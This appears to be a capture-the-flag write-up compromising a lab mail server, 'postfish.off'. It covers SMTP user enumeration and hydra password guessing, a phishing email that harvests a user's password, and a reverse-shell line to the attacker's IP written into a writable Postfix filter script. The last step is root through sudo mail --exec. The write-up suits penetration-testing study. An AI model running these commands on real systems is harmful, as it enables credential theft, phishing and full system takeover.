Writeup by wook413
Enumeration
Nmap
initial TCP scan
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-01-10 16:47 UTCNmap scan report for 192.168.201.137Host is up (0.046s latency).Not shown: 65528 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh25/tcp open smtp80/tcp open http110/tcp open pop3143/tcp open imap993/tcp open imaps995/tcp open pop3s
Nmap done: 1 IP address (1 host up) scanned in 14.05 secondsSecond TCP scan performed on the discovered ports
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ nmap $IP -sC -sV -p 22,25,80,110,143,993,995Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-01-10 16:48 UTCNmap scan report for 192.168.201.137Host is up (0.046s latency).
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)25/tcp open smtp Postfix smtpd|_ssl-date: TLS randomness does not represent time|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING| ssl-cert: Subject: commonName=ubuntu| Subject Alternative Name: DNS:ubuntu| Not valid before: 2021-01-26T10:26:37|_Not valid after: 2031-01-24T10:26:3780/tcp open http Apache httpd 2.4.41 ((Ubuntu))|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: Site doesn't have a title (text/html).110/tcp open pop3 Dovecot pop3d| ssl-cert: Subject: commonName=ubuntu| Subject Alternative Name: DNS:ubuntu| Not valid before: 2021-01-26T10:26:37|_Not valid after: 2031-01-24T10:26:37|_ssl-date: TLS randomness does not represent time|_pop3-capabilities: AUTH-RESP-CODE PIPELINING USER TOP RESP-CODES SASL(PLAIN) STLS CAPA UIDL143/tcp open imap Dovecot imapd (Ubuntu)| ssl-cert: Subject: commonName=ubuntu| Subject Alternative Name: DNS:ubuntu| Not valid before: 2021-01-26T10:26:37|_Not valid after: 2031-01-24T10:26:37|_ssl-date: TLS randomness does not represent time|_imap-capabilities: Pre-login IMAP4rev1 post-login have OK STARTTLS more ENABLE listed ID AUTH=PLAINA0001 SASL-IR LITERAL+ LOGIN-REFERRALS capabilities IDLE993/tcp open ssl/imap Dovecot imapd (Ubuntu)|_imap-capabilities: IMAP4rev1 post-login have OK LITERAL+ more ENABLE listed AUTH=PLAINA0001 Pre-login SASL-IR ID LOGIN-REFERRALS capabilities IDLE| ssl-cert: Subject: commonName=ubuntu| Subject Alternative Name: DNS:ubuntu| Not valid before: 2021-01-26T10:26:37|_Not valid after: 2031-01-24T10:26:37|_ssl-date: TLS randomness does not represent time995/tcp open ssl/pop3 Dovecot pop3d|_pop3-capabilities: AUTH-RESP-CODE RESP-CODES PIPELINING USER SASL(PLAIN) TOP CAPA UIDL|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=ubuntu| Subject Alternative Name: DNS:ubuntu| Not valid before: 2021-01-26T10:26:37|_Not valid after: 2031-01-24T10:26:37Service Info: Host: postfish.off; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .Nmap done: 1 IP address (1 host up) scanned in 16.82 secondsLastly, UDP scan on the top 10 ports
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-01-10 16:49 UTCNmap scan report for 192.168.201.137Host is up (0.045s latency).
PORT STATE SERVICE53/udp closed domain67/udp open|filtered dhcps123/udp closed ntp135/udp closed msrpc137/udp closed netbios-ns138/udp open|filtered netbios-dgm161/udp closed snmp445/udp closed microsoft-ds631/udp closed ipp1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 6.29 secondsInitial Access
HTTP 80
I tried to access the target IP via a web browser, but the host postfish.off could not be resolved so I added the following in /etc/hosts
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ echo "192.168.201.137 postfish.off" | sudo tee -a /etc/hosts192.168.201.137 postfish.offThe /team.html page lists four team members; I have noted their names as they may serve as potential usernames later.
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ cat users.txt Claire MaddisonMike RossBrian MooreSarah LoremSMTP 25
Having exhausted potential leads from the web interface, I proceeded to enumerate the SMTP service. I first used username-anarchy to generate a list of potential username permutations based on the identified staff names.
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop/username-anarchy]└─$ ./username-anarchy --input-file ../users.txt > ~/Desktop/potential_users.txt┌──(kali㉿kali)-[~/Desktop]└─$ cat potential_users.txt claire clairemaddisonclaire.maddisonclairema claimadd clairem c.maddisoncmaddison mclaire m.claire maddisoncmaddison maddison.cmaddison.clairecm mike mikerossmike.ross miker m.ross mross ...Running smtp-user-enum confirmed that three usernames from the generated list are valid on the server.
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ smtp-user-enum -M VRFY -U potential_users.txt -t $IP -p 25 Starting smtp-user-enum v1.2 ( <http://pentestmonkey.net/tools/smtp-user-enum> )
----------------------------------------------------------| Scan Information | ----------------------------------------------------------
Mode ..................... VRFYWorker Processes ......... 5Usernames file ........... potential_users.txtTarget count ............. 1Username count ........... 58Target TCP port .......... 25Query timeout ............ 5 secsTarget domain ............
######## Scan started at Sat Jan 10 17:52:32 2026 #########192.168.201.137: mike.ross exists192.168.201.137: brian.moore exists192.168.201.137: sarah.lorem exists######## Scan completed at Sat Jan 10 17:52:35 2026 #########3 results.
58 queries in 3 seconds (19.3 queries / sec)Despite extensive brute-force attempts, I was initially unable to identify passwords for these three accounts.
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ cewl <http://postfish.off> > mylist.txt ┌──(kali㉿kali)-[~/Desktop]└─$ cat mylist.txt CeWL 6.2.1 (More Fixes) Robin Wood ([email protected]) (<https://digi.ninja/>)Lorem consequat quis veniamminim enim aliqua magna dolorelaboreincididunttemporconsecteturadipiscing...I ran smtp-user-enum again using this custom wordlist, which successfully identified two additional valid accounts.
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ smtp-user-enum -M VRFY -U mylist.txt -t $IP Starting smtp-user-enum v1.2 ( <http://pentestmonkey.net/tools/smtp-user-enum> )
----------------------------------------------------------| Scan Information | ----------------------------------------------------------
Mode ..................... VRFYWorker Processes ......... 5Usernames file ........... mylist.txtTarget count ............. 1Username count ........... 117Target TCP port .......... 25Query timeout ............ 5 secsTarget domain ............
######## Scan started at Sat Jan 10 18:08:41 2026 #########192.168.201.137: Sales exists192.168.201.137: Legal exists######## Scan completed at Sat Jan 10 18:08:45 2026 #########2 results.
117 queries in 4 seconds (29.2 queries / sec)The consolidated list of discovered valid usernames is as follows::
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ cat final_list.txt mike.rossbrian.mooresarah.loremsaleslegalFinally found a set of valid credentials using hydra
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ hydra -L final_list.txt -P final_list.txt pop3://$IP Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2026-01-10 18:12:02[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal![DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task[DATA] attacking pop3://192.168.201.137:110/[110][pop3] host: 192.168.201.137 login: sales password: sales1 of 1 target successfully completed, 1 valid password foundHydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2026-01-10 18:12:14I successfully logged into pop3 server and found the following email
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ nc -nv $IP 110(UNKNOWN) [192.168.201.137] 110 (pop3) open+OK Dovecot (Ubuntu) ready.user sales+OKpass sales+OK Logged in.list+OK 1 messages:1 683.retr 1+OK 683 octetsReturn-Path: <[email protected]>X-Original-To: [email protected]Delivered-To: [email protected]Received: by postfish.off (Postfix, from userid 997) id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)Received: from x (localhost [127.0.0.1]) by postfish.off (Postfix) with SMTP id 7712145434 for <[email protected]>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)Subject: ERP Registration ReminderMessage-Id: <[email protected]>Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)From: [email protected]
Hi Sales team,
We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.
Regards,IT.Then I sent a phishing email to Brian Moore who is a part of the sales team using swaks
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ swaks -t [email protected] --from [email protected] --server postfish.off --body "click <http://192.168.45.236> to reset your password" --header "Subject: password reset"=== Trying postfish.off:25...=== Connected to postfish.off.<- 220 postfish.off ESMTP Postfix (Ubuntu) -> EHLO kali<- 250-postfish.off<- 250-PIPELINING<- 250-SIZE 10240000<- 250-VRFY<- 250-ETRN<- 250-STARTTLS<- 250-ENHANCEDSTATUSCODES<- 250-8BITMIME<- 250-DSN<- 250-SMTPUTF8<- 250 CHUNKING -> MAIL FROM:<[email protected]><- 250 2.1.0 Ok -> RCPT TO:<[email protected]><- 250 2.1.5 Ok -> DATA<- 354 End data with <CR><LF>.<CR><LF> -> Date: Sat, 10 Jan 2026 18:30:17 +0000 -> To: [email protected] -> From: [email protected] -> Subject: password reset -> Message-Id: <20260110183017.462846@kali> -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/ -> -> click <http://192.168.45.236> to reset your password -> -> -> .<- 250 2.0.0 Ok: queued as 7AF80404F6 -> QUIT<- 221 2.0.0 Bye=== Connection closed with remote host.After waiting a few minutes, I received a callback on my listener containing Brian’s credentials: EternaLSunshinE
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ nc -lvnp 80 listening on [any] 80 ...connect to [192.168.45.236] from (UNKNOWN) [192.168.201.137] 34984POST / HTTP/1.1Host: 192.168.45.236User-Agent: curl/7.68.0Accept: */*Content-Length: 207Content-Type: application/x-www-form-urlencoded
first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinESuccessfully got into SSH using his credentials
xxxxxxxxxxbrian.moore@postfish:~$ whoamibrian.mooreFound local.txt under /home/brian.moore
xxxxxxxxxxbrian.moore@postfish:~$ lslocal.txtbrian.moore@postfish:~$ cat local.txt4c7b...Privilege Escalation
id command revealed that the user brian.moore is a member of the filter group
xxxxxxxxxxbrian.moore@postfish:/$ iduid=1000(brian.moore) gid=1000(brian.moore) groups=1000(brian.moore),8(mail),997(filter)I identified an unusual file at /etc/postfix/disclaimer which is writable by any user in the filter group
xxxxxxxxxxbrian.moore@postfish:/$ find / -group filter 2>/dev/null/etc/postfix/disclaimer/var/spool/filter
brian.moore@postfish:/$ ls -la /etc/postfix/disclaimer-rwxrwx--- 1 root filter 1184 Jan 10 19:12 /etc/postfix/disclaimerI replaced the original file with the following code
xxxxxxxxxxbrian.moore@postfish:/$ echo '#!/bin/bash' > /etc/postfix/disclaimerbrian.moore@postfish:/$ echo 'bash -i >& /dev/tcp/192.168.45.236/443 0>&1' >> /etc/postfix/disclaimerbrian.moore@postfish:/$ cat /etc/postfix/disclaimerbash -i >& /dev/tcp/192.168.45.236/80 0>&1To execute the modified script and establish a connection to my listener, I sent another email to trigger the mail filter.
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ swaks -t [email protected] --from [email protected] --server postfish.off --body "hello me again" --header "Subject: hi there"=== Trying postfish.off:25...=== Connected to postfish.off.<- 220 postfish.off ESMTP Postfix (Ubuntu) -> EHLO kali<- 250-postfish.off<- 250-PIPELINING<- 250-SIZE 10240000<- 250-VRFY<- 250-ETRN<- 250-STARTTLS<- 250-ENHANCEDSTATUSCODES<- 250-8BITMIME<- 250-DSN<- 250-SMTPUTF8<- 250 CHUNKING -> MAIL FROM:<[email protected]><- 250 2.1.0 Ok -> RCPT TO:<[email protected]><- 250 2.1.5 Ok -> DATA<- 354 End data with <CR><LF>.<CR><LF> -> Date: Sat, 10 Jan 2026 19:28:01 +0000 -> To: [email protected] -> From: [email protected] -> Subject: hi there -> Message-Id: <20260110192801.492383@kali> -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/ -> -> hello me again -> -> -> .<- 250 2.0.0 Ok: queued as C779241A27 -> QUIT<- 221 2.0.0 Bye=== Connection closed with remote host.Got the shell as filter
xxxxxxxxxx┌──(kali㉿kali)-[~/Desktop]└─$ nc -lvnp 443listening on [any] 443 ...connect to [192.168.45.236] from (UNKNOWN) [192.168.201.137] 56362bash: cannot set terminal process group (264154): Inappropriate ioctl for devicebash: no job control in this shellfilter@postfish:/var/spool/postfix$ whoamiwhoamifilterfilter@postfish:/var/spool/postfix$ ididuid=997(filter) gid=997(filter) groups=997(filter)filter can run /usr/bin/mail without password
xxxxxxxxxxsudo -lMatching Defaults entries for filter on postfish: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User filter may run the following commands on postfish: (ALL) NOPASSWD: /usr/bin/mail *filter@postfish:/var/spool/postfix$ Got the shell as root
xxxxxxxxxxfilter@postfish:/var/spool/postfix$ sudo mail --exec='!/bin/bash'root@postfish:/var/spool/postfix# whoamirootFound proof.txt
xxxxxxxxxxroot@postfish:~# cat proof.txt3e0...